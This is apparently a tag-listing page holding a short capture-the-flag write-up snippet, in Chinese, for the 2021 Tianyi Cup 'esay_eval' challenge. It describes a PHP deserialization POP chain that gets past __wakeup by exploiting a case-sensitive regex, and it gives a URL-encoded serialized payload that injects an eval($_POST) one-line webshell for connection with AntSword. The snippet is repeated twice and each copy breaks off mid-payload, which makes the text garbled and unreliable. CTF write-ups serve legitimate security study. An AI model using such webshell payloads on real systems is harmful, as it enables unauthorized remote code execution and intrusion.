首页 > TAG信息列表 > esay
[天翼杯 2021]esay_eval--REDIS
代码pop链子构造不难,问题是反序列化要绕过wakeup,正常就是改数字,但是这里有个正则过滤 注意匹配的是大写字母,而类的名称大小写即可,于是可以绕过 反序列化传入一个一句话代码,蚁剑连接 ?poc=O:1:%22b%22:2:{s:1:%22a%22;O:1:%22a%22:1:{s:4:%22code%22;s:16:%22eval($_POST[1][天翼杯 2021]esay_eval--REDIS
代码pop链子构造不难,问题是反序列化要绕过wakeup,正常就是改数字,但是这里有个正则过滤 注意匹配的是大写字母,而类的名称大小写即可,于是可以绕过 反序列化传入一个一句话代码,蚁剑连接 ?poc=O:1:%22b%22:2:{s:1:%22a%22;O:1:%22a%22:1:{s:4:%22code%22;s:16:%22eval($_POST[1]